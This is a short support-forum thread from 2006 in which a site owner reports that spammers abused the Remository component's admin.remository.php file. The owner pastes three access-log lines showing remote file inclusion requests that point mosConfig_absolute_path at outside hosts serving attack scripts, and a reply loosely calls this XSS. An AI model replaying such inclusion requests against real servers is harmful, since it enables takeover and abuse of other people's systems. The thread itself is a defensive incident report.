I can’t be 100% sure but I’m pretty close — I had a bad spam attack that lasted for several hours utilizing my server. Apparently hackers were using mosconfig to exploit a vulnerability in admin.repository.php to send out thousands of pieces of email. I had to disable that file. I was wondering:
(1) Is there a converter to go back to the original remository? Looking at the database structure, this seems like a difficult conversion unless there is an existing converter.
(2) Can someone fix this? I’ve been using this component and have too many files in it!
65.125.133.104 – – [28/Aug/2006:17:30:36 -0400] “GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tckct.co.uk/v6.txt? HTTP/1.1” 200 58 “-” “libwww-perl/5.65”
205.145.128.233 – – [28/Aug/2006:19:38:33 -0400] “GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rubita15.webspacemania.com/i.txt? HTTP/1.1” 200 58 “-” “libwww-perl/5.79”
65.125.133.104 – – [28/Aug/2006:21:52:04 -0400] “GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tckct.co.uk/v6.txt? HTTP/1.1” 200 58 “-” “libwww-perl/5.65”
**** I see, this could be really dangerous, they can use XSS with this method to take over your machine.
Thanks for the heads up. I suggest you post this over at joomla.org if you haven’t already.
This topic contains 2 replies, has 2 voices, and was last updated by 
We moved to new unified forum. Please post all new support queries in our New Forum
